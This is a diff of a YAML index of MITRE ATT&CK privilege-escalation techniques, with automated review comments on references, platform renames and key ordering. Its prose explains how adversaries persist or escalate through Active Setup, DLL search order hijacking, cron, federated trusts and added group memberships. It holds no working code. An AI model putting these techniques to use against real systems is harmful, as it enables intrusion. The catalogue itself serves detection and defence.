Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine. Active Setup is a Windows mechanism that is used to execute programs when a user logs in. The value stored in the Registry key will be executed after a user logs into the computer.(Citation: Klein Active Setup 2010) These programs will be executed under the context of the user and will have the account's associated permissions level.
@@ -20146,12 +20407,11 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.014
atomic_tests: []
T1484.002:
technique:
- modified: '2024-04-19T04:27:51.388Z'
+ modified: '2024-09-25T13:50:11.593Z'
name: Domain Trust Modification
description: "Adversaries may add new domain trusts, modify the properties of
existing domain trusts, or otherwise change the configuration of trust relationships
@@ -20171,9 +20431,14 @@ privilege-escalation:
trust modifications such as altering the claim issuance rules to log in any
valid set of credentials as a specified user.(Citation: AADInternals zure
AD Federated Domain) \n\nAn adversary may also add a new federated identity
- provider to an identity tenant such as Okta, which may enable the adversary
- to authenticate as any user of the tenant.(Citation: Okta Cross-Tenant Impersonation
- 2023)"
+ provider to an identity tenant such as Okta or AWS IAM Identity Center, which
+ may enable the adversary to authenticate as any user of the tenant.(Citation:
+ Okta Cross-Tenant Impersonation 2023) This may enable the threat actor to
+ gain broad access into a variety of cloud-based services that leverage the
+ identity tenant. For example, in AWS environments, an adversary that creates
+ a new identity provider for an AWS Organization will be able to federate into
+ all of the AWS Organization member accounts without creating identities for
+ each of the member accounts.(Citation: AWS RE:Inforce Threat Detection 2024)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
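Review bot: the new `(Citation: AWS RE:Inforce Threat Detection 2024)` added in this description resolves to a slide-deck PDF on `reinforce.awsevents.com` (its reference entry is in a later hunk); event-site slide URLs tend to rot within a year or two, so an archived copy would make this reference more durable. The corresponding `x_mitre_version` bump to `2.1` is also in a separate hunk below, so these two hunks need to travel together.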
@@ -20193,9 +20458,8 @@ privilege-escalation:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- - Azure AD
- - SaaS
- x_mitre_version: '2.0'
+ - Identity Provider
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Application Log: Application Log Content'
@@ -20212,6 +20476,10 @@ privilege-escalation:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1484/002
external_id: T1484.002
+ - source_name: AWS RE:Inforce Threat Detection 2024
+ description: Ben Fletcher and Steve de Vera. (2024, June). New tactics and
+ techniques for proactive threat detection. Retrieved September 25, 2024.
+ url: https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf
- source_name: CISA SolarWinds Cloud Detection
description: CISA. (2021, January 8). Detecting Post-Compromise Threat Activity
in Microsoft Cloud Environments. Retrieved January 8, 2021.
@@ -20245,7 +20513,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1484.002
atomic_tests: []
T1543.003:
@@ -20401,31 +20668,11 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1543.003
atomic_tests: []
T1053.003:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
- type: attack-pattern
- created: '2019-12-03T14:25:00.538Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1053.003
- url: https://attack.mitre.org/techniques/T1053/003
- - source_name: 20 macOS Common Tools and Techniques
- url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
- description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
- Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-10-15T18:45:51.945Z'
name: 'Scheduled Task/Job: Cron'
description: "Adversaries may abuse the cron
utility to perform
task scheduling for initial or recurring execution of malicious code.(Citation:
@@ -20442,6 +20689,7 @@ privilege-escalation:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor scheduled task creation from common utilities using
command-line invocation. Legitimate scheduled tasks may be created during
installation of new software or through system administration functions. Look
@@ -20452,9 +20700,13 @@ privilege-escalation:
part of a chain of behavior that could lead to other activities, such as network
connections made for Command and Control, learning details about the environment
through Discovery, and Lateral Movement. "
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'File: File Modification'
- 'Process: Process Creation'
@@ -20462,8 +20714,24 @@ privilege-escalation:
- 'Command: Command Execution'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_remote_support: false
+ type: attack-pattern
+ id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
+ created: '2019-12-03T14:25:00.538Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1053/003
+ external_id: T1053.003
+ - source_name: 20 macOS Common Tools and Techniques
+ description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
+ Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
+ url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1053.003
atomic_tests:
- name: Cron - Replace crontab with referenced file
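Review bot: the T1053.003 fields deleted at the top of the object (`x_mitre_platforms`, `x_mitre_domains`, `object_marking_refs`, `id`, `type`, `created`, `created_by_ref`, `external_references`) all come back here, so the net content change for this technique is `x_mitre_version` `1.1` -> `1.2`, `x_mitre_attack_spec_version` `2.1.0` -> `3.2.0`, the new `x_mitre_deprecated: false`, `revoked: false` and `x_mitre_remote_support: false` keys, and the `modified` date. No description text changes in the visible lines despite the version bump, so confirm the 1.2 change sits outside this context. The atomic test list that follows is untouched.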
@@ -20582,7 +20850,7 @@ privilege-escalation:
'
T1098.003:
technique:
- modified: '2024-03-29T18:29:06.873Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Account Manipulation: Additional Cloud Roles'
description: "An adversary may add additional roles or permissions to an adversary-controlled
cloud account to maintain persistent access to a tenant. For example, adversaries
@@ -20612,6 +20880,7 @@ privilege-escalation:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Microsoft Threat Intelligence Center (MSTIC)
- Alex Parsons, Crowdstrike
@@ -20622,6 +20891,7 @@ privilege-escalation:
- Praetorian
- Alex Soler, AttackIQ
- Arad Inbar, Fidelis Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: 'Collect activity logs from IAM services and cloud administrator
accounts to identify unusual activity in the assignment of roles to those
@@ -20630,13 +20900,13 @@ privilege-escalation:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Office 365
- IaaS
- SaaS
- - Google Workspace
- - Azure AD
- x_mitre_version: '2.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.5'
x_mitre_data_sources:
- 'User Account: User Account Modification'
type: attack-pattern
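Review bot: `x_mitre_platforms` for T1098.003 drops `Office 365`, `Google Workspace` and `Azure AD` in favour of `Office Suite` and `Identity Provider` (T1484.002 above gets the same `Azure AD`/`SaaS` -> `Identity Provider` change). Anything that selects or indexes techniques by platform name will stop matching this technique unless it knows the new names, so check that every consumer keyed on the old platform strings is updated in the same change and that `Identity Provider` and `Office Suite` are spelled identically everywhere they appear.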
@@ -20678,9 +20948,6 @@ privilege-escalation:
url: https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098.003
atomic_tests: []
T1547.012:
@@ -20748,19 +21015,18 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.012
atomic_tests: []
T1574.001:
technique:
- modified: '2024-04-18T22:54:54.668Z'
+ modified: '2024-09-30T17:32:59.948Z'
name: 'Hijack Execution Flow: DLL Search Order Hijacking'
description: |-
Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.
There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)
- Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
+ Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Hexacorn DLL Hijacking)(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
Adversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking)
@@ -20776,8 +21042,8 @@ privilege-escalation:
- Travis Smith, Tripwire
- Stefan Kanthak
- Marina Liang
- - Will Alexander
- - Ami Holeston
+ - Ami Holeston, CrowdStrike
+ - Will Alexander, CrowdStrike
x_mitre_deprecated: false
x_mitre_detection: Monitor file systems for moving, renaming, replacing, or
modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared
@@ -20791,7 +21057,7 @@ privilege-escalation:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- x_mitre_version: '1.2'
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'File: File Modification'
- 'Module: Module Load'
@@ -20817,6 +21083,10 @@ privilege-escalation:
description: Harbour, N. (2011, June 3). What the fxsst?. Retrieved November
17, 2020.
url: https://www.fireeye.com/blog/threat-research/2011/06/fxsst.html
+ - source_name: Hexacorn DLL Hijacking
+ description: Hexacorn. (2013, December 8). Beyond good ol’ Run key, Part 5.
+ Retrieved August 14, 2024.
+ url: https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/
- source_name: Microsoft Security Advisory 2269637
description: Microsoft. (, May 23). Microsoft Security Advisory 2269637. Retrieved
March 13, 2020.
@@ -20844,12 +21114,11 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1574.001
atomic_tests: []
T1574.014:
technique:
- modified: '2024-04-18T15:03:32.158Z'
+ modified: '2024-04-28T15:44:25.342Z'
name: AppDomainManager
description: "Adversaries may execute their own malicious payloads by hijacking
how the .NET `AppDomainManager` loads assemblies. The .NET framework uses
@@ -20875,7 +21144,7 @@ privilege-escalation:
phase_name: defense-evasion
x_mitre_contributors:
- Thomas B
- - Ivy Bostock
+ - Ivy Drexel
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -20917,7 +21186,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1098.006:
technique:
@@ -20995,11 +21263,10 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1053:
technique:
- modified: '2024-03-01T15:29:46.832Z'
+ modified: '2024-10-15T15:14:03.453Z'
name: Scheduled Task/Job
description: |-
Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)
@@ -21079,7 +21346,77 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
+ atomic_tests: []
+ T1098.007:
+ technique:
+ modified: '2024-10-14T14:32:08.926Z'
+ name: Additional Local or Domain Groups
+ description: "An adversary may add additional local or domain groups to an adversary-controlled
+ account to maintain persistent access to a system or domain.\n\nOn Windows,
+ accounts may use the `net localgroup` and `net group` commands to add existing
+ users to local and domain groups.(Citation: Microsoft Net Localgroup)(Citation:
+ Microsoft Net Group) On Linux, adversaries may use the `usermod` command for
+ the same purpose.(Citation: Linux Usermod)\n\nFor example, accounts may be
+ added to the local administrators group on Windows devices to maintain elevated
+ privileges. They may also be added to the Remote Desktop Users group, which
+ allows them to leverage [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001)
+ to log into the endpoints in the future.(Citation: Microsoft RDP Logons) On
+ Linux, accounts may be added to the sudoers group, allowing them to persistently
+ leverage [Sudo and Sudo Caching](https://attack.mitre.org/techniques/T1548/003)
+ for elevated privileges. \n\nIn Windows environments, machine accounts may
+ also be added to domain groups. This allows the local SYSTEM account to gain
+ privileges on the domain.(Citation: RootDSE AD Detection 2022)"
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ x_mitre_contributors:
+ - Madhukar Raina (Senior Security Researcher - Hack The Box, UK)
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'User Account: User Account Modification'
+ type: attack-pattern
+ id: attack-pattern--3e6831b2-bf4c-4ae6-b328-2e7c6633b291
+ created: '2024-08-05T20:49:49.809Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1098/007
+ external_id: T1098.007
+ - source_name: Linux Usermod
+ description: Man7. (n.d.). Usermod. Retrieved August 5, 2024.
+ url: https://www.man7.org/linux/man-pages/man8/usermod.8.html
+ - source_name: Microsoft Net Group
+ description: Microsoft. (2016, August 31). Net group. Retrieved August 5,
+ 2024.
+ url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc754051(v=ws.11)
+ - source_name: Microsoft Net Localgroup
+ description: Microsoft. (2016, August 31). Net Localgroup. Retrieved August
+ 5, 2024.
+ url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc725622(v=ws.11)
+ - source_name: Microsoft RDP Logons
+ description: Microsoft. (2017, April 9). Allow log on through Remote Desktop
+ Services. Retrieved August 5, 2024.
+ url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/security-policy-settings/allow-log-on-through-remote-desktop-services
+ - source_name: RootDSE AD Detection 2022
+ description: Scarred Monk. (2022, May 6). Real-time detection scenarios in
+ Active Directory environments. Retrieved August 5, 2024.
+ url: https://rootdse.org/posts/monitoring-realtime-activedirectory-domain-scenarios
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1055.003:
technique:
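Review bot: the new T1098.007 object has no `identifier:` key, while neighbouring objects such as T1053.005, T1547 and T1098.003 carry `identifier: <technique id>` next to `atomic_tests`; a few others (T1037, T1574.007) also lack it, so the generator is inconsistent about emitting that key and the canonical form should be settled before another object is added in this shape. Two content points for upstream: `accounts may be added to the sudoers group` conflates the `sudoers` file with a group (the group that grants sudo is typically `sudo` or `wheel`, depending on the distribution), and `x_mitre_detection: ''` is empty, so this technique ships with no detection guidance at all.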
@@ -21102,7 +21439,7 @@ privilege-escalation:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
source_name: Elastic Process Injection July 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:22:50.800Z'
name: Thread Execution Hijacking
description: "Adversaries may inject malicious code into hijacked processes
in order to evade process-based defenses as well as possibly elevate privileges.
@@ -21150,8 +21487,6 @@ privilege-escalation:
- Anti-virus
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1055.003
atomic_tests: []
T1546.011:
@@ -21183,7 +21518,7 @@ privilege-escalation:
description: Pierce, Sean. (2015, November). Defending Against Malicious Application
Compatibility Shims. Retrieved June 22, 2017.
source_name: Black Hat 2015 App Shim
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2020-11-10T18:29:31.094Z'
name: 'Event Triggered Execution: Application Shimming'
description: "Adversaries may establish persistence and/or elevate privileges
by executing malicious content triggered by application shims. The Microsoft
@@ -21238,13 +21573,11 @@ privilege-escalation:
- 'Process: Process Creation'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1546.011
atomic_tests: []
T1547.010:
technique:
- modified: '2024-04-12T02:49:39.980Z'
+ modified: '2024-09-12T15:26:17.886Z'
name: 'Boot or Logon Autostart Execution: Port Monitors'
description: "Adversaries may use port monitors to run an adversary supplied
DLL during system boot for persistence or privilege escalation. A port monitor
@@ -21305,9 +21638,9 @@ privilege-escalation:
slides]. Retrieved November 12, 2014.
url: https://www.defcon.org/images/defcon-22/dc-22-presentations/Bloxham/DEFCON-22-Brady-Bloxham-Windows-API-Abuse-UPDATED.pdf
- source_name: AddMonitor
- description: Microsoft. (n.d.). AddMonitor function. Retrieved November 12,
- 2014.
- url: http://msdn.microsoft.com/en-us/library/dd183341
+ description: Microsoft. (n.d.). AddMonitor function. Retrieved September 12,
+ 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/printdocs/addmonitor
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
@@ -21316,7 +21649,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.010
atomic_tests: []
T1037.002:
@@ -21369,7 +21701,7 @@ privilege-escalation:
Wardle Persistence Chapter)\n\n**Note:** Login hooks were deprecated in 10.11
version of macOS in favor of [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)
and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) "
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T16:42:05.094Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Boot or Logon Initialization Scripts: Logon Script (Mac)'
x_mitre_detection: Monitor logon scripts for unusual access by abnormal users
@@ -21390,12 +21722,11 @@ privilege-escalation:
- 'Command: Command Execution'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1037.002
atomic_tests: []
T1055:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:45.488Z'
name: Process Injection
description: "Adversaries may inject code into processes in order to evade process-based
defenses as well as possibly elevate privileges. Process injection is a method
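Review bot: T1037.002 is the one object in this region that keeps `x_mitre_attack_spec_version: 2.1.0` together with `x_mitre_modified_by_ref` while only `spec_version` is dropped, whereas T1055.003 and T1546.011 above lose the 2.1.0 field as well. Its new `modified` date (2022-04-20) is later than theirs, so this is consistent with copying upstream verbatim, but a reader of the diff cannot tell that from the hunk; a one-line rationale in the commit message would prevent this being reported as an inconsistency.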
@@ -21498,7 +21829,6 @@ privilege-escalation:
url: http://www.chokepoint.net/2014/02/detecting-userland-preload-rootkits.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1055
atomic_tests: []
T1611:
@@ -21598,12 +21928,11 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1611
atomic_tests: []
T1547.009:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T13:41:16.110Z'
name: 'Boot or Logon Autostart Execution: Shortcut Modification'
description: |-
Adversaries may create or modify shortcuts that can execute a program during system boot or user login. Shortcuts or symbolic links are used to reference other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process.
@@ -21616,7 +21945,6 @@ privilege-escalation:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- x_mitre_attack_spec_version: 2.1.0
x_mitre_contributors:
- David French, Elastic
- Bobby, Filar, Elastic
@@ -21629,7 +21957,6 @@ privilege-escalation:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.2'
@@ -21659,7 +21986,8 @@ privilege-escalation:
url: https://www.youtube.com/watch?v=nJ0UsyiUEqQ
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1547.009
atomic_tests: []
T1547.005:
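Review bot: for T1547.009 the version bump of `x_mitre_attack_spec_version` from 2.1.0 to 3.2.0 is split across three hunks: the old field and `x_mitre_modified_by_ref` are deleted mid-object in the two hunks above, then both are re-added here after `object_marking_refs`. The net change is a value bump plus a key reorder, but the diff presents it as unrelated deletions and additions, and the same remove-then-re-add shape repeats for T1574.008, T1484.001 and T1078.001 below. Emitting keys in a stable order from the generator (for example sorted, or in the upstream object's order every time) would make future regenerations show only value changes.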
@@ -21686,7 +22014,7 @@ privilege-escalation:
description: Microsoft. (2013, July 31). Configuring Additional LSA Protection.
Retrieved June 24, 2015.
source_name: Microsoft Configure LSA
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-25T15:42:48.910Z'
name: 'Boot or Logon Autostart Execution: Security Support Provider'
description: |-
Adversaries may abuse security support providers (SSPs) to execute DLLs when the system boots. Windows SSP DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs.
@@ -21712,13 +22040,11 @@ privilege-escalation:
- 'Windows Registry: Windows Registry Key Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1547.005
atomic_tests: []
T1543.004:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:48.453Z'
name: 'Create or Modify System Process: Launch Daemon'
description: |-
Adversaries may create or modify Launch Daemons to execute malicious payloads as part of persistence. Launch Daemons are plist files used to interact with Launchd, the service management framework used by macOS. Launch Daemons require elevated privileges to install, are executed for every user on a system prior to login, and run in the background without the need for user interaction. During the macOS initialization startup, the launchd process loads the parameters for launch-on-demand system-level daemons from plist files found in /System/Library/LaunchDaemons/
and /Library/LaunchDaemons/
. Required Launch Daemons parameters include a Label
to identify the task, Program
to provide a path to the executable, and RunAtLoad
to specify when the task is run. Launch Daemons are often used to provide access to shared resources, updates to software, or conduct automation tasks.(Citation: AppleDocs Launch Agent Daemons)(Citation: Methods of Mac Malware Persistence)(Citation: launchd Keywords for plists)
@@ -21795,12 +22121,11 @@ privilege-escalation:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
identifier: T1543.004
atomic_tests: []
T1574.008:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-12T15:25:57.059Z'
name: 'Hijack Execution Flow: Path Interception by Search Order Hijacking'
description: |-
Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.
@@ -21819,6 +22144,7 @@ privilege-escalation:
phase_name: defense-evasion
x_mitre_contributors:
- Stefan Kanthak
+ x_mitre_deprecated: false
x_mitre_detection: |
Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.
@@ -21826,7 +22152,6 @@ privilege-escalation:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.0'
@@ -21846,34 +22171,36 @@ privilege-escalation:
id: attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2
created: '2020-03-13T17:48:58.999Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1574/008
external_id: T1574.008
+ - source_name: Microsoft Environment Property
+ description: Microsoft. (2011, October 24). Environment Property. Retrieved
+ July 27, 2016.
+ url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
- source_name: Microsoft CreateProcess
- description: Microsoft. (n.d.). CreateProcess function. Retrieved December
- 5, 2014.
- url: http://msdn.microsoft.com/en-us/library/ms682425
+ description: Microsoft. (n.d.). CreateProcess function. Retrieved September
+ 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa
+ - source_name: Microsoft WinExec
+ description: Microsoft. (n.d.). WinExec function. Retrieved September 12,
+ 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-winexec
- source_name: Windows NT Command Shell
description: Tim Hill. (2014, February 2). The Windows NT Command Shell. Retrieved
December 5, 2014.
url: https://docs.microsoft.com/en-us/previous-versions//cc723564(v=technet.10)?redirectedfrom=MSDN#XSLTsection127121120120
- - source_name: Microsoft WinExec
- description: Microsoft. (n.d.). WinExec function. Retrieved December 5, 2014.
- url: http://msdn.microsoft.com/en-us/library/ms687393
- - source_name: Microsoft Environment Property
- description: Microsoft. (2011, October 24). Environment Property. Retrieved
- July 27, 2016.
- url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
